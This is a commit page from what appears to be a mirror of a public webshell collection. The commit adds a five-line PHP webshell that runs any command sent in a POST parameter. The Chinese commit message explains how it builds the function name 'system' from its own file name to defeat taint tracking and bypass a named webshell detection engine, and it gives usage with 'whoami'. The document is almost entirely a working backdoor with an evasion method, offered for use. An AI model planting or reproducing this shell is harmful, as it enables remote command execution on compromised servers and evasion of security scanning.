Create system2022-08-22-3.php · a5b681ccf8 - Mirrors/webshell - CherryKitten

Mirrors/webshell

mirror of https://github.com/tennc/webshell synced 2024-11-10 05:44:11 +00:00

Create system2022-08-22-3.php

from: https://zhuanlan.zhihu.com/p/550150061
__FILE__是PHP的一个魔术常量，它会返回当前执行PHP脚本的完整路径和文件名，我们利用substr()函数逆着截取，就能获得system再利用变量做函数的方式，打断了污点追踪的过程，进行命令执行，也可以成功bypass掉牧云引擎。
usage:
file:xxx.php
post: body==>1=whoami

This commit is contained in:

tennc

2022-08-22 22:40:18 +08:00

committed by

GitHub

parent 615c74bdec

commit a5b681ccf8

No known key found for this signature in database

GPG key ID: 4AEE18F83AFDEB23

1 changed files with 5 additions and 0 deletions

									
										5

php/system2022-08-22-3.php
									
										Normal file
									
										View file
										
				@ -0,0 +1,5 @@

				<?php

				//bypass 牧云 文件名需要设置为system

				$filename=substr(__FILE__,-10,6);

				$command=$_POST[1];

				$filename($command);